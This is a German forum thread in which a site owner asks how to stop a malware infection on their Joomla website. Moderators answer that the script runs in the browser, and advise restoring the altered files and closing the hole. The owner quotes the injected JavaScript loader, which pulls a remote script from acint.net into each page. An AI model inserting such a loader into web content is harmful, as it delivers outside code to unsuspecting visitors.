Verhindern Laden Skripts von bestimmter Quelle

Alles, was den Apache betrifft, kann hier besprochen werden.

Verhindern Laden Skripts von bestimmter Quelle

Postby tt22tt » 01. April 2016 09:32

Hallo alle zusammen,

bei mir auf der Homepage ist eine Schadsoftware. Die lädt immer ein Skript von acint.net
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()

Kann ich als erste Maßnahme verhindern, dass der Apache Skripte von dieser Quelle lädt? Ich würde gerne einfach acint.net direkt auf dem Webserver blockkieren.
Auf dem Webserver ist Ubuntu,ohne XAMPP, aber mit dem neuesten Apache, PHP etc.

LG
tt22tt
 
Posts: 4
Joined: 01. April 2016 09:28
Operating System: Ubuntu

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby Altrea » 01. April 2016 13:59

Hallo,

Das wird nicht funktionieren. Das JavaScript wird erst auf Client Seite ausgeführt und daher wird das Script auch nicht vom Apache angefordert sondern vom Browser des Clients.

Mit freundlichen Grüßen,
Altrea
We don't provide any support via personal channels like PM, email, Skype, TeamViewer!

It's like porn for programmers 8)
User avatar
Altrea
AF Moderator
 
Posts: 8299
Joined: 17. August 2009 13:05
XAMPP version: several
Operating System: Windows 10 Pro x64

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby tt22tt » 01. April 2016 14:12

Kann ich irgendwie die Domain beim Parsen von PHP ersetzen?
Gibt es eine Möglichkeit, dass der Server die angeforderte php-Datei bevor er sie ausgibt sich anschaut und sie verändert/manipuliert?
tt22tt
 
Posts: 4
Joined: 01. April 2016 09:28
Operating System: Ubuntu

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby Altrea » 01. April 2016 14:32

Bevor ich überlegen würde wie ich alle meine Scripte nach einem Stück code parse und manipuliere bevor ich sie ausliefern lasse, würde ich eher an der Ursache forschen.
Finde alle Scripts die so manipuliert wurden und stelle sie wieder in den Ursprungszustand her. Anschließend finde die Ursache wie diese Dateien so manipuliert werden konnten und Stopfe diese Lücke umgehend.
We don't provide any support via personal channels like PM, email, Skype, TeamViewer!

It's like porn for programmers 8)
User avatar
Altrea
AF Moderator
 
Posts: 8299
Joined: 17. August 2009 13:05
XAMPP version: several
Operating System: Windows 10 Pro x64

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby tt22tt » 01. April 2016 15:39

Ich habe schon alle möglichen Skripts gefunden und gelöscht, aber seltsamerweise ist der Code immernoch enthalten.
Aktuell setze ich die Homepage auf einem neuen CMS auf: Ich ziehe von Joomla nach Wordpress um.
Dann hat sich das bald sowieso erledigt. Allerdings wollte ich das nicht so überstürzt machen und dachte, ich hätte noch eine Übergangslösung...

Dazu noch eine Frage:
Wenn ich die neue Homepage in Wordpress aufgebaut habe, sind noch viele Inhalte in der alten Homepage unter Joomla. Damit wir Blacklisting und Spam-Versand vermeiden können, würde ich gerne die Joomla-Homepage abschalten.
Hat jemand eine Idee, wie ich trotzdem noch an die Inhalte komme und sie laufen lassen kann, ohne dass sie mit extern kommunizieren kann? Gibt es außer einer VM noch eine Möglichkeit? :roll:
tt22tt
 
Posts: 4
Joined: 01. April 2016 09:28
Operating System: Ubuntu

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby Altrea » 01. April 2016 16:53

tt22tt wrote:Wenn ich die neue Homepage in Wordpress aufgebaut habe, sind noch viele Inhalte in der alten Homepage unter Joomla. Damit wir Blacklisting und Spam-Versand vermeiden können, würde ich gerne die Joomla-Homepage abschalten.
Hat jemand eine Idee, wie ich trotzdem noch an die Inhalte komme und sie laufen lassen kann, ohne dass sie mit extern kommunizieren kann? Gibt es außer einer VM noch eine Möglichkeit? :roll:

Du kannst eine lokale Entwicklungsumgebung auf deinem lokalen PC aufbauen (Beispielsweise mit XAMPP) und dort die Joomla Installation aufbauen.
We don't provide any support via personal channels like PM, email, Skype, TeamViewer!

It's like porn for programmers 8)
User avatar
Altrea
AF Moderator
 
Posts: 8299
Joined: 17. August 2009 13:05
XAMPP version: several
Operating System: Windows 10 Pro x64

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby Nobbie » 01. April 2016 20:09

tt22tt wrote:Aktuell setze ich die Homepage auf einem neuen CMS auf: Ich ziehe von Joomla nach Wordpress um.


tt22tt wrote:Damit wir Blacklisting und Spam-Versand vermeiden können


Was denn nun - "ich" oder "wir"? Kann niemand bei "wir" behilflich sein? Dieses Forum ist leider kein Forum für Joomla/Wordpress Probleme, vielleicht ist jemand von "wir" in der Lage, Dir zu helfen?!
Nobbie
 
Posts: 8780
Joined: 09. March 2008 13:04

Re: Verhindern Laden Skripts von bestimmter Quelle

Postby tt22tt » 11. April 2016 09:16

Altrea wrote:
tt22tt wrote:Wenn ich die neue Homepage in Wordpress aufgebaut habe, sind noch viele Inhalte in der alten Homepage unter Joomla. Damit wir Blacklisting und Spam-Versand vermeiden können, würde ich gerne die Joomla-Homepage abschalten.
Hat jemand eine Idee, wie ich trotzdem noch an die Inhalte komme und sie laufen lassen kann, ohne dass sie mit extern kommunizieren kann? Gibt es außer einer VM noch eine Möglichkeit? :roll:

Du kannst eine lokale Entwicklungsumgebung auf deinem lokalen PC aufbauen (Beispielsweise mit XAMPP) und dort die Joomla Installation aufbauen.


Gute Idee! Ich schaue mal, ob ich das mit XAMPP in einer VM mache :D
tt22tt
 
Posts: 4
Joined: 01. April 2016 09:28
Operating System: Ubuntu


Return to Apache

Who is online

Users browsing this forum: No registered users and 8 guests